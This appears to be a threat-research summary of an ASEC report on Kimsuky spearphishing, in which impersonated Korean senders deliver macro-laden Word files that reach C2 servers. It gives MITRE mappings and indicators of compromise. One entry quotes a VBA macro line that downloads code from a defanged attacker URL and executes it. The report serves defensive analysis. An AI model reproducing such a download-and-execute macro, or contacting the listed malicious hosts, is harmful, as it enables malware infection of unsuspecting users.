Threat Research

Word File Provided as External Link When Replying to Attacker’s Email (Kimsuky) – ASEC BLOG

Securonix

ASEC has observed ongoing distribution of North Korea–related Word files used in Kimsuky campaigns, including variants that rely on mshta. Attackers impersonate Korean organizations to trigger a follow-up email with a link to download a malicious Word document that deploys macros and connects to a C2. Hashtags: #Kimsuky #NorthKorea #Mshta #WordMacros

Keypoints

  • Malicious Word files linked to North Korea-related activity (Kimsuky) are being distributed, including variants tied to AhnLab TIP and other NK-focused themes, with one type using mshta.
  • The campaign often starts with an impersonated sender from a Korean organization, followed by a reply containing a link to download a malicious Word file after the recipient expresses interest.
  • Type 1: A Word document contains a VBA macro that connects to a URL and attempts to download and execute additional content, including creating version.ini and invoking VBScript.
  • Type 2: A Word document uses mshta to reach C2, with macros prompting users to enable content and then executing further commands to reach additional URLs.
  • Opening the Word document prompts macro-enabled execution (Enable Content), making it harder for users to detect the malicious behavior.
  • IOC indicators include specific Word document hashes and several malicious URLs/domains used to fetch payloads and download Word files.

MITRE Techniques

  • [T1566.001] Phishing – Spearphishing Link – The attacker impersonated a person from a Korean organization to send an email requesting a consultation for a report. Bracket quote: ‘The attacker impersonated a person from a Korean organization to send an email requesting a consultation for a report.’
  • [T1204.002] User Execution: Malicious File – Opening the Word file will show an image asking users to enable macros by clicking the Enable Content button. Bracket quote: ‘Opening the Word file will show an image asking users to enable macros by clicking the Enable Content button.’
  • [T1059.005] Command and Scripting Interpreter: Visual Basic – The Word macro contains a VBA macro that connects to a URL. Bracket quote: ‘The file contains a VBA macro that connects to a certain URL.’
  • [T1105] Ingress Tool Transfer – The macro downloads payload from a URL via HTTP GET. Bracket quote: ‘Set mx = CreateObject(“Microsoft.XMLHTTP”):mx.open “GET”, “hxxp://asssambly.mywebcommunity[.]org/file/upload/list.php?query=1”, False:mx.Send:Execute(mx.responseText)’
  • [T1218.005] Signed Binary Proxy Execution: Mshta – Type 2 uses mshta to reach C2. Bracket quote: ‘Type 2 is distributed with a file related to a specific webinar and accesses C2 through mshta.’

Indicators of Compromise

  • [File Name] – Consultation Request.doc, CV of Kim **(Korean American Organization of **,220711).doc
  • [Hash] – 357ef37979b02b08120895ae5175eb0a, 7fe055d5aa72bd50470da61985e12a8a
  • [Domain] – asssambly.mywebcommunity[.]org, freunkown1.sportsontheweb[.]net
  • [URL] – hxxp://asssambly.mywebcommunity[.]org/file/upload/list.php?query=1, hxxp://freunkown1.sportsontheweb[.]net/h.php
  • [URL] – hxxps://accounts.serviceprotect[.]eu/signin/v2/identifier?hl=kr&passive=true&<omitted>rtnurl=aHR0cHM6Ly9kb2NzLmdv<omitted>

Read more: https://asec.ahnlab.com/en/37396/